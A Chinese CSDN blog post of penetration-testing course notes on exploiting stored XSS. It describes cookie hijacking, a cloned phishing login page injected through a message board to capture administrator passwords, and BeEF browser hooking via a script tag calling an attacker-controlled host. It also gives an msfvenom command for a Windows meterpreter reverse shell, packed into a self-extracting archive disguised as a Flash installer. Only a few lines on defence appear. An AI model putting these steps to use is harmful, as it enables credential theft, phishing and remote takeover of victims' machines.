DAY22xss2

最新推荐文章于 2024-10-09 21:23:37 发布
最新推荐文章于 2024-10-09 21:23:37 发布
阅读量832 收藏 14
点赞数 23
文章标签: xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hellodaoyan/article/details/135572655
版权

远程调用xss平台网站需要在意是http还是https协议 cookie的利用 

1.抓包利用

2.特定浏览器活软件

这个浏览器的使用教程

点进去之后再点击这个

然后我们开始 利用cookie

cookie有几个值我们就添加几个

3.浏览器插件

遇到的突发情况 例如空白 404 

这个时候我们要有种思维

变换页面 可能是我们的管理界面被换了 只删了留言我们可以改id 或者把参数改了

如果页面也没了 我们尝试访问admin等其他目录、

当然这些都以cookie有效为前提

总的来说就是扫二级目录

遇到safedog 的登录2级验证

也是尝试二级目录更换页面

3  什么情况使用马哥欺骗工具 但是不管什么站都能使用bp

https-only开启时我们进行的攻击

利用htto-only 获取cookie有一定限制 例如下面这个

怎么确定打开http-only 使用awvs

原理 我们利用xss 让管理员进入他的登录界面后会重新进入我们制造好的钓鱼页面 

进入后输入密码 我们 在返回给他正常的登录界面   在我们的vps上就有他的账号和密码了

伪造页面步骤:1.准备好http-only利用代码

源码展示 后台代码

跳转到真正的登录界面

在使用前需要先创建一个数据库

把之前已经伪造过的页面删除 我们需要创建新的伪造页面

步骤如下 正常的下载这个网页不过需要将后缀改为htm

但是这样的下载会因为编码问题出现很多问题所以我建议还是使用kali当中的下图软件进行下载

下载好后不要用外面这个

这个才是真的

下载好后查看源码 发现后台的代码还需要我们做出修改

把action修改如下

然后检查表单 用户 和 密码  修改一下name

然后就好了

接下来就是将钓鱼链接利用存储型 xss 放在留言板 进行攻击

但是管理员进入后有bug 会立刻发现自己被钓鱼了

将这一串代码放在xss代码网站

把这个代码替换了   但是下面标蓝的代码我们需要放到平台里面

把这个放进去

然后我们获取到密码后删除这个项目就行了

xss登录利用案例

这个cms会记录用户名和密码登录情况 这样就会有xss

用户名 有长度限制 然后我们 用极限代码 当然能不用 最好不要用 应为会导致界面显示不完整

beef-xss利用

kali自带 beef -xxs启动 密码也是beef 密码我们可以设置为admin溜进去的是这个代码

让我们访问一下看看源码

使用的话就是在有存储型xss代码下 加上这句话

<script src"https://192. 168. 10. 101:3000/hook.js"></script>

比较脆弱 管理员关了浏览器界面就失效了

然后当管理员进入留言板界面 不需要点击我们留言板内容不需要吸引 反正视频演示时他没有点进去 让我们的beef-xss界面就能看见我们黑进去的网站了  如下

绿色代表命令可以用 灰色 未知   橙色 容易被管理员察觉 红色不能用 可以尝试  点点或许又行

选中 然后双击下图 就能执行命令

这些命令作用 看英文就知道了 功能很强大 比简单的xss平台好用很多

创建框架 上图标蓝的地方是一种权限维持方案 使用后创建百分百隐藏框架 只要管理员在页面当中会一直停在一个页面 怎么举例呢 就是现在b站吧点进一个视频会跳出一个新网站 而不是把b站首页覆盖了 会一直维持 也就是会跳转新窗口

联合kali的MSF进行钓鱼 目前看来似乎就是往压缩包里面下毒

在kali当中输入这个命令

msfvenon -p windows/meterpreter/reverse_tcp lhost=192.168.80.103 lport=1122 -f exe > 1.exe

第一步 创建 压缩文件 勾选创建自解压格式压缩文件

第二步高级 自解压选项

选路径 不要直接c:   选择一些我们一般有权限的 怎么看呢:

选c盘随便一个文件夹 看需要管理员权限否

这种就行

第3 步 设置解压后运行下图有些错误 我们要把flash也能 解压

第4步设置 模式 有隐藏

第5步更新 覆盖所有文件

然后直接创建出来

下载flsh官网然后 改名

为了更像 去官网 在body这块彻底cv一下

然后再源码这修改下载地址 把我们的包放进去也就是我们网站根目录

第6步开监听

第7步 别人点了安装包就 监听成功

XSS平台搭建

不好用 不如自己买vps

在我们虚拟机写好代码

创建在phpstudy  然后想办法通过隧道连接外网

然后我们用的是 内网连内网 是不用隧道

主要是加载我们的phpstud网站中的 x.txt的代码

然后就打印过来了

为了防止被发现    可以改一下名字

然后是iis xss平台搭建 我没有源码没法自己搭建 需要的可以去视频1.25看

github上有

通过POST  修改为 get  然后通过管理员 去点击链接  然后显示了一个界面实际上已经创建成功我们想要的结果

防御 输入验证码 

审查陌生链接源码

通过来源判断

可以用来水报告 这个漏洞   看起危险 实际上鸡肋

hellodaoyan
关注
Day2Xss
Panacea
09-30 119
今天把悬剑挪出来了,物理机直接能打开,太香了 毫无过滤的情况下 也就是输入什么输出什么,可以在源码中直接看出来 直接输入<script>alert(1)</script> http://www.xxx.com?xxx=<script>alert(1)</script> 输出在&lt;script&gt;/lt;/script&gt;之间的情况 使用</script>闭合掉 过滤script字符 双写或者大小写绕过 过滤掉双
XSS漏洞——渗透day08
qq_62716256的博客
09-04 600
XSS漏洞——渗透day08
day4 xss
weixin_65333372的博客
08-31 705
HTML解析⼀个HTML解析器作为⼀个状态机,它从输⼊流中获取字符并按照转换规则转换到另⼀种状态。在解析过程中,任何时候它只要遇到⼀个'
DAY18:XSS 漏洞
qq_49433473的博客
07-30 377
XSS漏洞概述,JavaScript基础,前置技能,XSS所需的JavaScript事件,反射性XSS、存储型XSS、DOM型XSS概述,XSS的Bypass技巧
DAY18:Xss 靶场通关手册
qq_49433473的博客
07-30 1395
xss-labs 靶场通关手册,超详细
记一个xss通杀0day的挖掘与CVE提交
杳若的博客
08-20 132
XSS-0day的挖掘
Day5Xss
Panacea
10-03 133
谷歌浏览器下的绕过 无任何过滤 谷歌一般是直接过滤危险字符,比如: http://bangbang.qq.com/php/login?game=roco&uin="><img src=1 onerror=alert(1)>&world=5&roleid=44583443&level=8&role=%2 弹窗代码为: http://bangbang.qq.com/php/login?game=roco&uin="><script
Day4Xss
Panacea
10-02 142
注释中巧用换行符 这种情况出现在代码中输入的东西在源码中一模一样的显示,但是这种情况出现的并不多 使用换行符绕过 payload为 FilterValueAnd=%0aalert(1) 反射型xss告一段落,总结:巧用换行符、宽字节、反斜杠 DOM型XSS 不同浏览器利用iframe XSS可以利用不同浏览器的特性来进行弹窗 src 执行 javascript 代码 <iframe src="javascript:alert(1)"></iframe> IE 下 vbscrip
XSS day01
qq_39536716的博客
04-26 146
简介 跨站脚本攻击,英文全称是 Cross Site Script ,本来缩写是CSS,但是为了和层叠样式表有所区别,所以在安全领域叫做“XSSXSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页的时候,控制用户浏览器的一种攻击。 分类 反射型XSS(非持久型XSS) 反射型XSS只是简单的把用户输入的数据,反射给浏览器,黑客往往需要诱使用户“点击”一个...
java版商城源码下载-shadow2:渗透超全面的渗透资料:hundred_points:包含:0day,xss,sql注入,提权……
06-05
├─0day & exp │ ├─08CMS │ ├─AKCMS │ ├─bbsxp │ │ ├─BBSxp7.0 │ │ ├─bbsxp综合利用工具 │ │ └─BBSXP论坛漏洞完全注册工具 │ ├─BLUECMS │ ├─CreateLiveCMS │ ├─discuz │ │ ├─...
Day22
03-29
今天,我们来到了"Day22",这通常意味着我们正在深入探索某个特定的技术主题或编程概念。尽管"第22天"的标签没有提供具体的信息,但我们可以假设这是一个持续的课程或项目的一部分,其中每个学习日都围绕一个特定的...
xss 跨站脚本攻击
最新发布
秋夫人
10-09 336
XSS 是一种注入类型的攻击,攻击者将恶意脚本注入到受信任的网站中。当其他用户访问该网站时,这些脚本会在用户的浏览器中执行。
Pikachu-Cross-Site Scripting-xss盲打
guanrongl的专栏
10-03 561
xss盲打,不是一种漏洞类型,而是一个攻击场景;在前端、或者在当前页面是看不到攻击结果;而是在后端、在别的页面才看到结果。登陆后台,查看结果;
Pikachu-xss防范措施 - href输出 & js输出
guanrongl的专栏
10-03 629
要想防止href 标签的xss : 一、可以做输入限定,只允许http 、https 的头的输入;二、结合输入限定后再做特殊字符转义。转义:所有输出到前端的数据,都根据输出点进行转义,比如输出到html中进行html实体转义,输入到 JS 里面的进行 JS 转义。过滤:根据业务需要进行过滤,如:输入点要求输入手机号,则只允许输入手机号格式的数字;从页面代码上看出,这是个href 标签,并且做了href特殊字符转换。核心点是:$ms == 'tmac'总体原则: 输入做过滤,输出做转义。
xss之dom类型
m0_74741186的博客
10-05 536
上我们的pikachu。
Pikachu-Cross-Site Scripting-反射型xss(get)
guanrongl的专栏
10-02 606
存储型XSS是指恶意脚本被存储在目标服务器上,当用户访问包含该脚本的页面时,脚本会被执行。例如,攻击者可以在留言板中输入恶意脚本,当其他用户查看留言时,脚本会在他们的浏览器中执行。这种类型的XSS不需要服务器端的参与,攻击者通过构造特定的URL或操作DOM,使得浏览器执行恶意脚本。提交构造的脚本代码(以及各种绕过姿势),看是否可以成功执行,如果成功执行则说明存在XSS漏洞;2、输入一组“特殊字符+唯一识别字符”,点击提交后,查看返回的源码,是否有做对应的处理;先输入各种特殊字符,查看源代码,查看页面返回;
Pikichu-xss实验案例-通过xss获取cookie
guanrongl的专栏
10-02 525
查看后端代码cookie.php:就是获取cookie信息,保存起来,然后重定向跳转到目标页面;修改最后从定向的ip,改为自己测试用的IP地址;对此,构造攻击payload, 获取到cookie ,然后从定向跳转到pkxss后台,pkxss后台把数据保存后,重新重定向回到被攻击的页面。该后台可以把获得的cookie信息显示出来;pikachu提供了一个pkxss后台;
XSS基础
2302_81328699的博客
10-01 431
【代码】XSS基础
理解DOM型XSS攻击与防护策略
田靖宇-day211是一篇关于信息安全实训的文章,重点讲解了DOM-XSS攻击的相关知识。DOM-XSS,全称文档对象模型跨站脚本攻击,是Web安全领域中的一种常见漏洞类型。它利用浏览器的Document Object Model (DOM)文档对象...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值